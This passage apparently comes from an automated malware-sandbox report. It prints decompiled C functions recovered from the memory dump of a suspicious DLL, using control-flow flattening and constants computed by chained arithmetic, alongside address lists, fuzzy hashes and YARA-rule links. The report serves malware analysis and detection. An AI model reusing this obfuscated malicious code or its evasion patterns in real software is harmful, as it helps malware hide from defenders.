					if(_t243 == 0x759c44b) {
						_t243 = 0x108803d;
						_v524 = _v572;
						goto L21;
					}
					__eflags = _t243 - 0x8ef3eab;
					if(__eflags == 0) {
						_t243 = 0x163a44b;
						_v524 = _v528;
						goto L1;
					}
					__eflags = _t243 - 0xcb7b8c8;
					if(_t243 != 0xcb7b8c8) {
						goto L21;
					}
					_t240 = E1001DCE6(_v580, _v552, _t243, _v588, _v596);
					_t277 = _t240;
					_t280 =  &(_t280[4]);
					__eflags = _t240;
					if(__eflags == 0) {
						_t243 = 0x759c44b;
					} else {
						 *((intOrPtr*)( *0x10025208 + 0xc)) = 1;
						_t243 = 0x8ef3eab;
					}
					goto L1;
					L21:
					__eflags = _t243 - 0x8f788be;
				} while (__eflags != 0);
				goto L8;
			}

0x10007931
0x10007937
0x10007941
0x10007949
0x1000794e
0x10007956
0x1000795e
0x10007966
0x1000796e
0x10007980
0x10007985
0x1000798b
0x10007993
0x10007995
0x1000799d
0x100079a5
0x100079ad
0x100079b9
0x100079be
0x100079c4
0x100079cc
0x100079d4
0x100079dc
0x100079e4
0x100079ec
0x100079f4
0x10007a00
0x10007a05
0x10007a10
0x10007a11
0x10007a15
0x10007a1a
0x10007a22
0x10007a2a
0x10007a2f
0x10007a3d
0x10007a41
0x10007a49
0x10007a51
0x10007a59
0x10007a61
0x10007a69
0x10007a71
0x10007a76
0x10007a7e
0x10007a86
0x10007a8e
0x10007a96
0x10007a9b
0x10007aa0
0x10007aa8
0x10007ab0
0x10007ab8
0x10007ac0
0x10007ac8
0x10007acd
0x10007ad5
0x10007add
0x10007ae5
0x10007aed
0x10007af5
0x10007afd
0x10007b0f
0x10007b14
0x10007b1a
0x10007b27
0x10007b2f
0x10007b34
0x10007b39
0x10007b41
0x10007b49
0x10007b51
0x10007b5b
0x10007b5e
0x10007b62
0x10007b67
0x10007b6f
0x10007b77
0x10007b7c
0x10007b8c
0x10007b90
0x10007b98
0x10007ba0
0x10007ba8
0x10007bb0
0x10007bb8
0x10007bc0
0x10007bc8
0x10007bd0
0x10007bd8
0x10007bdd
0x10007be5
0x10007bf1
0x10007bf4
0x10007bf8
0x10007bfc
0x10007bfc
0x10007c04
0x10007c04
0x10007c04
0x10007c04
0x10007c06
0x00000000
0x00000000
0x10007c0c
0x10007cf4
0x10007cf9
0x00000000
0x10007cf9
0x10007c18
0x10007cd6
0x10007cdd
0x10007ce2
0x10007ce5
0x10007cea
0x00000000
0x10007cea
0x10007c20
0x10007c8e
0x10007caf
0x10007cb4
0x10007cb7
0x10007cb9
0x10007cbd
0x10007cbe
0x00000000
0x10007cbe
0x10007c28
0x10007c80
0x10007c87
0x00000000
0x10007c87
0x10007c2a
0x10007c30
0x00000000
0x00000000
0x10007c43
0x10007c62
0x10007c66
0x10007c71
0x10007c71
0x10007d03
0x10007d09
0x10007d6f
0x10007d71
0x00000000
0x10007d71
0x10007d0b
0x10007d11
0x10007d5d
0x10007d62
0x00000000
0x10007d62
0x10007d13
0x10007d19
0x00000000
0x00000000
0x10007d2c
0x10007d31
0x10007d33
0x10007d36
0x10007d38
0x10007d4f
0x10007d3a
0x10007d42
0x10007d45
0x10007d45
0x00000000
0x10007d75
0x10007d75
0x10007d75
0x00000000

Strings

r2g, xrefs: 100079A5

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: r2g
API String ID: 0-2526201254
Opcode ID: ad2d2b01e3da7611e9e5bd9676829930a5dc57ae71bce952b41486226d51a90e
Instruction ID: 0942dd307ddd4d02389cae5fb1eaf66bdd92e58e3c2202b16dae7c6508fcbfea
Opcode Fuzzy Hash: ad2d2b01e3da7611e9e5bd9676829930a5dc57ae71bce952b41486226d51a90e
Instruction Fuzzy Hash: BFB113B15083809FE358CF65C48A81FBBE1FBC4758F504A1EF69686264D3B9DA09CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10007549, Relevance: 1.5, Strings: 1, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10007549(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v44;
				intOrPtr _v52;
				intOrPtr _v68;
				intOrPtr _v88;
				char _v96;
				intOrPtr _v124;
				char _v128;
				char _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				unsigned int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t122;
				signed int _t128;
				signed int _t134;
				void* _t152;
				intOrPtr _t167;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t182;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t122);
				_v160 = 0x9267a5;
				_t180 = _t179 + 0x14;
				_v160 = _v160 >> 7;
				_t176 = 0;
				_v160 = _v160 << 3;
				_t152 = 0xa75c68c;
				_v160 = _v160 ^ 0x000d68a0;
				_v172 = 0x9f05e6;
				_v172 = _v172 ^ 0x9b685cf1;
				_v172 = _v172 * 0x1c;
				_v172 = _v172 >> 0xf;
				_v172 = _v172 ^ 0x00099d12;
				_v156 = 0x459b1a;
				_v156 = _v156 << 5;
				_v156 = _v156 >> 6;
				_v156 = _v156 ^ 0x00289b26;
				_v148 = 0xc767c;
				_v148 = _v148 ^ 0x82c530fe;
				_v148 = _v148 ^ 0x82c2144b;
				_v168 = 0xb4cf87;
				_t177 = _v148;
				_v168 = _v168 * 0x24;
				_v168 = _v168 + 0xffff5f8c;
				_v168 = _v168 + 0xffff2c08;
				_v168 = _v168 ^ 0x196e2c04;
				_v180 = 0x595f0e;
				_v180 = _v180 << 0xc;
				_v180 = _v180 | 0xd9ffdeb3;
				_v180 = _v180 ^ 0xddf80359;
				_v140 = 0x9cb5e5;
				_v140 = _v140 + 0xffffbdec;
				_v140 = _v140 ^ 0x0096111d;
				_v164 = 0xb88ef9;
				_v164 = _v164 ^ 0x8ebb5fe7;
				_v164 = _v164 >> 1;
				_v164 = _v164 ^ 0x47079857;
				_v144 = 0x2cf85d;
				_v144 = _v144 * 0x41;
				_v144 = _v144 ^ 0x0b6bebb3;
				_v176 = 0x9b2e31;
				_v176 = _v176 + 0xffff426e;
				_v176 = _v176 + 0xb8d0;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x1368d7f7;
				_v152 = 0xe41ef8;
				_v152 = _v152 << 2;
				_v152 = _v152 | 0xad7edc50;
				_v152 = _v152 ^ 0xaff1c3c2;
				while(1) {
					_t182 = _t152 - 0xad2762c;
					if(_t182 > 0) {
						goto L24;
					}
					L2:
					if(_t182 == 0) {
						__eflags = _v124 - 1;
						if(_v124 == 1) {
							E10013FF3( &_v96);
							L17:
							_t152 = 0x8c9b482;
							continue;
							do {
								while(1) {
									_t182 = _t152 - 0xad2762c;
									if(_t182 > 0) {
										goto L24;
									}
									goto L2;
								}
								goto L24;
								L46:
								__eflags = _t152 - 0xd4fb3fd;
							} while (_t152 != 0xd4fb3fd);
							return _t176;
						}
						_t152 = 0x9b21cf;
						continue;
					}
					if(_t152 == 0x9b21cf) {
						__eflags = _v124 - 2;
						if(_v124 == 2) {
							E10001B70( &_v96, _t177);
							goto L17;
						}
						_t152 = 0x2b66f5b;
						continue;
					}
					if(_t152 == 0x2b66f5b) {
						__eflags = _v124 - 3;
						if(_v124 == 3) {
							E10020C0C( &_v96);
							goto L17;
						}
						_t152 = 0xee804bd;
						continue;
					}
					if(_t152 == 0x825070b) {
						_t134 = E1001EC5A(_v180,  &_v128, _v140,  &_v136);
						asm("sbb ecx, ecx");
						_t152 = ( ~_t134 & 0x02759a6e) + 0xcde76f1;
						continue;
					}
					if(_t152 == 0x8c9b482) {
						_t167 =  *0x1002520c;
						_t176 = _t176 + 1;
						 *((intOrPtr*)(_t177 + 8)) =  *((intOrPtr*)(_t167 + 0x21c));
						 *((intOrPtr*)(_t167 + 0x21c)) = _t177;
						L11:
						_t152 = 0xcde76f1;
						continue;
					}
					if(_t152 == 0x96069cf) {
						__eflags = 0;
						E100044D2(0);
						goto L11;
					}
					if(_t152 != 0xa75c68c) {
						goto L46;
					}
					E1000A488(_a4,  &_v44, _v160, _v172);
					_t180 = _t180 + 8;
					_t152 = 0x96069cf;
					continue;
					L24:
					__eflags = _t152 - 0xcde76f1;
					if(__eflags == 0) {
						_t128 = E10003FB0( &_v136, _v156, __eflags, _v148, _v168,  &_v44);
						_t180 = _t180 + 0xc;
						__eflags = _t128;
						if(_t128 != 0) {
							L32:
							_t152 = 0x825070b;
							continue;
						}
						_t152 = 0xd4fb3fd;
						goto L46;
					}
					__eflags = _t152 - 0xdcd2208;
					if(_t152 == 0xdcd2208) {
						__eflags = _v124 - 6;
						if(_v124 == 6) {
							E100093A7( &_v96);
							goto L17;
						}
						_t152 = 0xf4c3ebb;
						continue;
					}
					__eflags = _t152 - 0xdde50b9;
					if(_t152 == 0xdde50b9) {
						__eflags = _v124 - 5;
						if(_v124 == 5) {
							E1000BD63( &_v96, _t177);
							goto L17;
						}
						_t152 = 0xdcd2208;
						continue;
					}
					__eflags = _t152 - 0xee804bd;
					if(_t152 == 0xee804bd) {
						__eflags = _v124 - 4;
						if(_v124 == 4) {
							E10004A13( &_v96);
							goto L17;
						}
						_t152 = 0xdde50b9;
						continue;
					}
					__eflags = _t152 - 0xf4c3ebb;
					if(_t152 == 0xf4c3ebb) {
						__eflags = _v124 - 7;
						if(_v124 == 7) {
							E1001FB22( &_v96);
						}
						goto L17;
					}
					__eflags = _t152 - 0xf54115f;
					if(_t152 != 0xf54115f) {
						goto L46;
					}
					_push(_t152);
					_t177 = E100134E7(_t152, 0x2c);
					_t180 = _t180 + 0xc;
					__eflags = _t177;
					if(_t177 == 0) {
						goto L32;
					}
					_t152 = 0xad2762c;
					 *((intOrPtr*)(_t177 + 0xc)) = _v88;
					 *((intOrPtr*)(_t177 + 4)) = _v52;
					 *((intOrPtr*)(_t177 + 0x20)) = _v68;
				}
			}

0x10007553
0x1000755a
0x10007561
0x10007568
0x10007569
0x1000756a
0x1000756f
0x10007577
0x1000757a
0x1000757f
0x10007581
0x10007586
0x1000758b
0x10007598
0x100075a5
0x100075b2
0x100075b6
0x100075bb
0x100075c3
0x100075cb
0x100075d0
0x100075d5
0x100075dd
0x100075e5
0x100075ed
0x100075f5
0x10007602
0x10007606
0x1000760a
0x10007612
0x1000761a
0x10007622
0x1000762a
0x1000762f
0x10007637
0x1000763f
0x10007647
0x1000764f
0x10007657
0x1000765f
0x10007667
0x1000766b
0x10007673
0x10007680
0x10007684
0x1000768c
0x10007694
0x1000769c
0x100076a4
0x100076a9
0x100076b1
0x100076b9
0x100076be
0x100076c6
0x100076ce
0x100076ce
0x100076d4
0x00000000
0x00000000
0x100076da
0x100076da
0x100077ca
0x100077cf
0x100077df
0x100077a5
0x100077a5
0x100077a7
0x100076ce
0x100076ce
0x100076ce
0x100076d4
0x00000000
0x00000000
0x00000000
0x100076d4
0x00000000
0x10007918
0x10007918
0x10007918
0x10007930
0x10007930
0x100077d1
0x00000000
0x100077d1
0x100076e6
0x100077ac
0x100077b1
0x100077c3
0x00000000
0x100077c3
0x100077b3
0x00000000
0x100077b3
0x100076f2
0x1000778b
0x10007790
0x100077a0
0x00000000
0x100077a0
0x10007792
0x00000000
0x10007792
0x100076fe
0x10007771
0x1000777c
0x10007784
0x00000000
0x10007784
0x10007702
0x10007748
0x1000774e
0x10007755
0x10007758
0x10007744
0x10007744
0x00000000
0x10007744
0x1000770a
0x1000773d
0x1000773f
0x00000000
0x1000773f
0x10007712
0x00000000
0x00000000
0x1000772e
0x10007733
0x10007736
0x00000000
0x100077e6
0x100077e6
0x100077e8
0x10007903
0x10007908
0x1000790b
0x1000790d
0x10007869
0x10007869
0x00000000
0x10007869
0x10007913
0x00000000
0x10007913
0x100077ee
0x100077f4
0x100078cc
0x100078d1
0x100078e1
0x00000000
0x100078e1
0x100078d3
0x00000000
0x100078d3
0x100077fa
0x10007800
0x100078ab
0x100078b0
0x100078c2
0x00000000
0x100078c2
0x100078b2
0x00000000
0x100078b2
0x10007806
0x1000780c
0x1000788c
0x10007891
0x100078a1
0x00000000
0x100078a1
0x10007893
0x00000000
0x10007893
0x1000780e
0x10007814
0x10007873
0x10007878
0x10007882
0x10007882
0x00000000
0x10007878
0x10007816
0x1000781c
0x00000000
0x00000000
0x10007832
0x1000783b
0x1000783d
0x10007840
0x10007842
0x00000000
0x00000000
0x10007848
0x1000784d
0x10007857
0x10007861
0x10007861

Strings

WJC, xrefs: 10007568

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: WJC
API String ID: 0-2817494758
Opcode ID: 67049d72db05e9921abe697d1220fddd42879e470776d345aa56d41a0c008825
Instruction ID: fb27141c5dfb4ddcb4d29866bacb172a389d22ee957b1b32096e4ca6337c6aac
Opcode Fuzzy Hash: 67049d72db05e9921abe697d1220fddd42879e470776d345aa56d41a0c008825
Instruction Fuzzy Hash: 69918A7090C341DBE6A9CF20C49592EBBE0FBC43C8F10491EF99A46268DB799949CF57

Uniqueness

Uniqueness Score: -1.00%

Function 1000D1FD, Relevance: 1.4, Strings: 1, Instructions: 189
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E1000D1FD(void* __ecx, void* __edx, void* __eflags) {
				void* _t198;
				void* _t219;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				void* _t248;
				void* _t251;
				void* _t254;
				void* _t255;

				_t254 = _t255 - 0x5c;
				_push( *((intOrPtr*)(_t254 + 0x7c)));
				_t248 = __edx;
				_t251 = __ecx;
				_push( *((intOrPtr*)(_t254 + 0x78)));
				_push(0);
				_push( *((intOrPtr*)(_t254 + 0x70)));
				_push( *((intOrPtr*)(_t254 + 0x6c)));
				_push( *((intOrPtr*)(_t254 + 0x68)));
				_push( *((intOrPtr*)(_t254 + 0x64)));
				_push(__edx);
				_push(__ecx);
				E100167B8(_t198);
				 *(_t254 + 0xc) =  *(_t254 + 0xc) & 0x00000000;
				 *((intOrPtr*)(_t254 + 4)) = 0x51c3c9;
				 *((intOrPtr*)(_t254 + 8)) = 0x4df8d0;
				 *(_t254 + 0x38) = 0xf4f4fc;
				 *(_t254 + 0x38) =  *(_t254 + 0x38) << 0xb;
				 *(_t254 + 0x38) =  *(_t254 + 0x38) + 0xe9db;
				 *(_t254 + 0x38) =  *(_t254 + 0x38) ^ 0xa7a91887;
				 *(_t254 + 0x44) = 0x88ff7b;
				 *(_t254 + 0x44) =  *(_t254 + 0x44) ^ 0xfbc92f9d;
				 *(_t254 + 0x44) =  *(_t254 + 0x44) + 0xffff5469;
				 *(_t254 + 0x44) =  *(_t254 + 0x44) << 5;
				 *(_t254 + 0x44) =  *(_t254 + 0x44) ^ 0x68229208;
				 *(_t254 + 0x20) = 0x5bb7f5;
				 *(_t254 + 0x20) =  *(_t254 + 0x20) << 0xd;
				 *(_t254 + 0x20) =  *(_t254 + 0x20) ^ 0x76fba42b;
				 *(_t254 + 0x54) = 0x230ff0;
				 *(_t254 + 0x54) =  *(_t254 + 0x54) >> 4;
				 *(_t254 + 0x54) =  *(_t254 + 0x54) + 0xf0bf;
				 *(_t254 + 0x54) =  *(_t254 + 0x54) + 0xffff0dcc;
				 *(_t254 + 0x54) =  *(_t254 + 0x54) ^ 0x00067fd8;
				 *(_t254 + 0x18) = 0x824003;
				_t224 = 7;
				 *(_t254 + 0x18) =  *(_t254 + 0x18) / _t224;
				 *(_t254 + 0x18) =  *(_t254 + 0x18) ^ 0x00135015;
				 *(_t254 + 0x58) = 0xd3585f;
				 *(_t254 + 0x58) =  *(_t254 + 0x58) >> 0xd;
				_t225 = 0x1c;
				 *(_t254 + 0x58) =  *(_t254 + 0x58) / _t225;
				_t226 = 0x29;
				 *(_t254 + 0x58) =  *(_t254 + 0x58) / _t226;
				 *(_t254 + 0x58) =  *(_t254 + 0x58) ^ 0x00073c83;
				 *(_t254 + 0x4c) = 0x9f9a0f;
				 *(_t254 + 0x4c) =  *(_t254 + 0x4c) >> 3;
				 *(_t254 + 0x4c) =  *(_t254 + 0x4c) ^ 0xf1d33e41;
				 *(_t254 + 0x4c) =  *(_t254 + 0x4c) | 0x96372380;
				 *(_t254 + 0x4c) =  *(_t254 + 0x4c) ^ 0xf7f5e6e5;
				 *(_t254 + 0x34) = 0xf3f515;
				 *(_t254 + 0x34) =  *(_t254 + 0x34) | 0x7cdc5ecd;
				 *(_t254 + 0x34) =  *(_t254 + 0x34) ^ 0xd940a02a;
				 *(_t254 + 0x34) =  *(_t254 + 0x34) ^ 0xa5bb9e5a;
				 *(_t254 + 0x3c) = 0xcd73dc;
				 *(_t254 + 0x3c) =  *(_t254 + 0x3c) << 2;
				 *(_t254 + 0x3c) =  *(_t254 + 0x3c) ^ 0x81e5cd3f;
				 *(_t254 + 0x3c) =  *(_t254 + 0x3c) ^ 0x82db4c41;
				 *(_t254 + 0x30) = 0x5260c6;
				_t227 = 0x2f;
				 *(_t254 + 0x30) =  *(_t254 + 0x30) / _t227;
				 *(_t254 + 0x30) =  *(_t254 + 0x30) << 3;
				 *(_t254 + 0x30) =  *(_t254 + 0x30) ^ 0x0009a428;
				 *(_t254 + 0x28) = 0x3b4a53;
				 *(_t254 + 0x28) =  *(_t254 + 0x28) * 0x7a;
				 *(_t254 + 0x28) =  *(_t254 + 0x28) << 8;
				 *(_t254 + 0x28) =  *(_t254 + 0x28) ^ 0x4161bb64;
				 *(_t254 + 0x48) = 0x197d0c;
				 *(_t254 + 0x48) =  *(_t254 + 0x48) >> 0xb;
				 *(_t254 + 0x48) =  *(_t254 + 0x48) | 0x2844428e;
				 *(_t254 + 0x48) =  *(_t254 + 0x48) << 0xb;
				 *(_t254 + 0x48) =  *(_t254 + 0x48) ^ 0x221087d4;
				 *(_t254 + 0x14) = 0x5a2e16;
				_t228 = 0x5e;
				 *(_t254 + 0x14) =  *(_t254 + 0x14) * 0x50;
				 *(_t254 + 0x14) =  *(_t254 + 0x14) ^ 0x1c234891;
				 *(_t254 + 0x10) = 0x68d0f;
				 *(_t254 + 0x10) =  *(_t254 + 0x10) + 0xa6a7;
				 *(_t254 + 0x10) =  *(_t254 + 0x10) ^ 0x0007f978;
				 *(_t254 + 0x50) = 0xa86057;
				 *(_t254 + 0x50) =  *(_t254 + 0x50) | 0x17cffcc3;
				 *(_t254 + 0x50) =  *(_t254 + 0x50) * 0x4c;
				 *(_t254 + 0x50) =  *(_t254 + 0x50) + 0xffffefa7;
				 *(_t254 + 0x50) =  *(_t254 + 0x50) ^ 0x1b32ca45;
				 *(_t254 + 0x40) = 0x88468c;
				_t143 = _t254 - 0x50; // 0xd6eeb0d1
				 *(_t254 + 0x40) =  *(_t254 + 0x40) / _t228;
				 *(_t254 + 0x40) =  *(_t254 + 0x40) + 0xffff7871;
				 *(_t254 + 0x40) =  *(_t254 + 0x40) + 0x8526;
				 *(_t254 + 0x40) =  *(_t254 + 0x40) ^ 0x0002ab05;
				 *(_t254 + 0x24) = 0xc1aa94;
				 *(_t254 + 0x24) =  *(_t254 + 0x24) << 8;
				 *(_t254 + 0x24) =  *(_t254 + 0x24) * 0x46;
				 *(_t254 + 0x24) =  *(_t254 + 0x24) ^ 0xf4a1cb5c;
				 *(_t254 + 0x1c) = 0x52be77;
				 *(_t254 + 0x1c) =  *(_t254 + 0x1c) >> 5;
				 *(_t254 + 0x1c) =  *(_t254 + 0x1c) ^ 0x00044550;
				 *(_t254 + 0x2c) = 0xb40dfb;
				 *(_t254 + 0x2c) =  *(_t254 + 0x2c) * 0x2d;
				 *(_t254 + 0x2c) =  *(_t254 + 0x2c) | 0x2aa52638;
				 *(_t254 + 0x2c) =  *(_t254 + 0x2c) ^ 0x3fa9d2b4;
				_t229 =  *(_t254 + 0x38);
				E1001A5E3( *(_t254 + 0x38), _t143,  *(_t254 + 0x44),  *(_t254 + 0x20), 0x44,  *(_t254 + 0x54));
				 *((intOrPtr*)(_t254 - 0x50)) = 0x44;
				_t175 = _t254 - 0xc; // 0xd6eeb115
				_t179 = _t254 - 0x50; // 0xd6eeb0d1
				if(E10008F07( *(_t254 + 0x18),  *(_t254 + 0x58),  *(_t254 + 0x38),  *(_t254 + 0x4c), _t251,  *(_t254 + 0x34),  *(_t254 + 0x3c),  *((intOrPtr*)(_t254 + 0x78)), _t229, _t179,  *(_t254 + 0x30), _t229, _t175,  *((intOrPtr*)(_t254 + 0x70)), _t229,  *(_t254 + 0x28)) == 0) {
					_t219 = 0;
				} else {
					if(_t248 == 0) {
						E100074B2( *(_t254 + 0x48),  *(_t254 + 0x14),  *(_t254 + 0x10),  *((intOrPtr*)(_t254 - 0xc)),  *(_t254 + 0x50));
						E100074B2( *(_t254 + 0x40),  *(_t254 + 0x24),  *(_t254 + 0x1c),  *((intOrPtr*)(_t254 - 8)),  *(_t254 + 0x2c));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t219 = 1;
				}
				return _t219;
			}

0x1000d1fe
0x1000d20a
0x1000d20d
0x1000d20f
0x1000d211
0x1000d214
0x1000d216
0x1000d219
0x1000d21c
0x1000d21f
0x1000d222
0x1000d223
0x1000d224
0x1000d229
0x1000d22f
0x1000d236
0x1000d23d
0x1000d244
0x1000d248
0x1000d24f
0x1000d256
0x1000d25d
0x1000d264
0x1000d26b
0x1000d26f
0x1000d276
0x1000d27d
0x1000d281
0x1000d288
0x1000d28f
0x1000d293
0x1000d29a
0x1000d2a1
0x1000d2a8
0x1000d2b4
0x1000d2b9
0x1000d2be
0x1000d2c5
0x1000d2cc
0x1000d2d3
0x1000d2d8
0x1000d2e0
0x1000d2e5
0x1000d2ea
0x1000d2f1
0x1000d2f8
0x1000d2fc
0x1000d303
0x1000d30a
0x1000d311
0x1000d318
0x1000d31f
0x1000d326
0x1000d32d
0x1000d334
0x1000d338
0x1000d33f
0x1000d346
0x1000d350
0x1000d353
0x1000d356
0x1000d35a
0x1000d361
0x1000d36c
0x1000d371
0x1000d375
0x1000d37c
0x1000d383
0x1000d387
0x1000d38e
0x1000d392
0x1000d399
0x1000d3a6
0x1000d3a7
0x1000d3aa
0x1000d3b1
0x1000d3b8
0x1000d3bf
0x1000d3c6
0x1000d3cd
0x1000d3d8
0x1000d3db
0x1000d3e2
0x1000d3e9
0x1000d3f5
0x1000d3f8
0x1000d3fb
0x1000d402
0x1000d409
0x1000d410
0x1000d417
0x1000d41f
0x1000d422
0x1000d429
0x1000d430
0x1000d434
0x1000d43b
0x1000d446
0x1000d449
0x1000d450
0x1000d462
0x1000d465
0x1000d46d
0x1000d474
0x1000d483
0x1000d4a6
0x1000d4e5
0x1000d4a8
0x1000d4aa
0x1000d4c7
0x1000d4db
0x1000d4ac
0x1000d4af
0x1000d4b0
0x1000d4b1
0x1000d4b2
0x1000d4b2
0x1000d4b5
0x1000d4b5
0x1000d4ed

Strings

SJ;, xrefs: 1000D361

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: SJ;
API String ID: 0-707135312
Opcode ID: 9d09973fa1c0d601fb4c4bc6d0a2c23dd017b23ab089cb8a612fd5ea3ce973ae
Instruction ID: f5a6a1c373cd4c746a07df0308ebaedf6bd577f0d32bff9206e68b6418f5e3e9
Opcode Fuzzy Hash: 9d09973fa1c0d601fb4c4bc6d0a2c23dd017b23ab089cb8a612fd5ea3ce973ae
Instruction Fuzzy Hash: 9B91EF72400288ABDF59CFA4C94A9CE3FB1FF04398F119219FE1596264D3B6D999CF84

Uniqueness

Uniqueness Score: -1.00%

Function 1000C29B, Relevance: 1.4, Strings: 1, Instructions: 118
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E1000C29B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v68;
				intOrPtr _v72;
				char _v592;
				void* _t124;
				signed int _t142;
				signed int _t143;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t124);
				_v72 = 0x5494d9;
				asm("stosd");
				_t142 = 0x45;
				asm("stosd");
				asm("stosd");
				_v12 = 0xf6fc4d;
				_v12 = _v12 + 0xb73d;
				_v12 = _v12 + 0xc7f8;
				_v12 = _v12 + 0xffffc147;
				_v12 = _v12 ^ 0x00fa58cc;
				_v28 = 0xcbc473;
				_v28 = _v28 + 0xffffce0c;
				_v28 = _v28 >> 0xb;
				_v28 = _v28 ^ 0x00095697;
				_v40 = 0xb19625;
				_v40 = _v40 + 0xd5c1;
				_v40 = _v40 * 0x70;
				_v40 = _v40 ^ 0x4e043588;
				_v32 = 0x3dae1a;
				_v32 = _v32 | 0x7b3269a3;
				_v32 = _v32 + 0xffff0658;
				_v32 = _v32 ^ 0x7b338879;
				_v8 = 0x351350;
				_v8 = _v8 ^ 0x0350db76;
				_v8 = _v8 >> 1;
				_v8 = _v8 + 0xffff8362;
				_v8 = _v8 ^ 0x01b481b2;
				_v20 = 0xe3d037;
				_v20 = _v20 * 0x3c;
				_v20 = _v20 | 0xbb228b46;
				_v20 = _v20 * 0x1b;
				_v20 = _v20 ^ 0x2fd120d0;
				_v56 = 0x3276f4;
				_v56 = _v56 | 0x71f2e911;
				_v56 = _v56 ^ 0x71f04b7e;
				_v48 = 0x13b6dd;
				_v48 = _v48 ^ 0x0fd7f575;
				_v48 = _v48 ^ 0x0fc37418;
				_v52 = 0xf79596;
				_v52 = _v52 / _t142;
				_v52 = _v52 ^ 0x000fb49c;
				_v16 = 0xe3455;
				_t143 = 0x3e;
				_v16 = _v16 / _t143;
				_v16 = _v16 | 0x83bd7aee;
				_v16 = _v16 + 0xffffbfb0;
				_v16 = _v16 ^ 0x83bf0c4e;
				_v36 = 0xf4dd79;
				_v36 = _v36 ^ 0x2cb7e8e7;
				_v36 = _v36 + 0x6da;
				_v36 = _v36 ^ 0x2c417922;
				_v24 = 0x80c19d;
				_v24 = _v24 >> 8;
				_v24 = _v24 + 0x915b;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x0009911a;
				_v44 = 0x8ba311;
				_v44 = _v44 + 0xffffb0c1;
				_v44 = _v44 * 0x5b;
				_v44 = _v44 ^ 0x31806e91;
				_push(_v32);
				_push(_v40);
				_push(_v28);
				E100206BE(_v20, _v44, _v56,  &_v592, _v12, E1000416C(_v12, 0x100012b8), _v48, _a8);
				E1000B952(_v52, _t135, _v16, _v36);
				return E1000D84C(_v24, _v44,  &_v592);
			}

0x1000c2a6
0x1000c2a9
0x1000c2ac
0x1000c2ad
0x1000c2ae
0x1000c2b3
0x1000c2c1
0x1000c2c4
0x1000c2c7
0x1000c2c8
0x1000c2c9
0x1000c2d0
0x1000c2d7
0x1000c2de
0x1000c2e5
0x1000c2ec
0x1000c2f3
0x1000c2fa
0x1000c2fe
0x1000c305
0x1000c30c
0x1000c317
0x1000c31a
0x1000c321
0x1000c328
0x1000c32f
0x1000c336
0x1000c33d
0x1000c344
0x1000c34b
0x1000c34e
0x1000c355
0x1000c35c
0x1000c367
0x1000c36a
0x1000c375
0x1000c378
0x1000c37f
0x1000c386
0x1000c38d
0x1000c394
0x1000c39b
0x1000c3a2
0x1000c3a9
0x1000c3b7
0x1000c3ba
0x1000c3c1
0x1000c3cb
0x1000c3ce
0x1000c3d1
0x1000c3d8
0x1000c3df
0x1000c3e6
0x1000c3ed
0x1000c3f4
0x1000c3fb
0x1000c402
0x1000c409
0x1000c40d
0x1000c414
0x1000c418
0x1000c41f
0x1000c426
0x1000c431
0x1000c434
0x1000c43b
0x1000c443
0x1000c446
0x1000c46e
0x1000c47e
0x1000c49d

Strings

"yA,, xrefs: 1000C3FB

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: "yA,
API String ID: 0-2883975633
Opcode ID: 1cff63c1d84ac6007d815f84e6e37b3a4ee74f264cb09a46801c5543cf5140c5
Instruction ID: 1dbd15b713720be5b6083ac1021c5cc05b026a22201c2c60a9dc4ccf25376802
Opcode Fuzzy Hash: 1cff63c1d84ac6007d815f84e6e37b3a4ee74f264cb09a46801c5543cf5140c5
Instruction Fuzzy Hash: 875110B6C0161EABCF48CFE5D98A8DEBBB1FF48314F208159D415B6260D3B51A49CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10008B74, Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10008B74(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t89;
				void* _t93;
				void* _t95;
				void* _t97;
				signed int _t99;
				void* _t104;
				void* _t105;
				signed int* _t107;

				_t107 =  &_v44;
				_v44 = 0xe64e4b;
				_v44 = _v44 + 0x9f5e;
				_v44 = _v44 + 0x5272;
				_v44 = _v44 + 0xffff062c;
				_v44 = _v44 ^ 0x00e1525a;
				_v8 = 0x11438b;
				_t97 = __ecx;
				_t104 = 0;
				_t99 = 0x3f;
				_t105 = 0x9ed10ef;
				_v8 = _v8 / _t99;
				_v8 = _v8 ^ 0x0003c0e6;
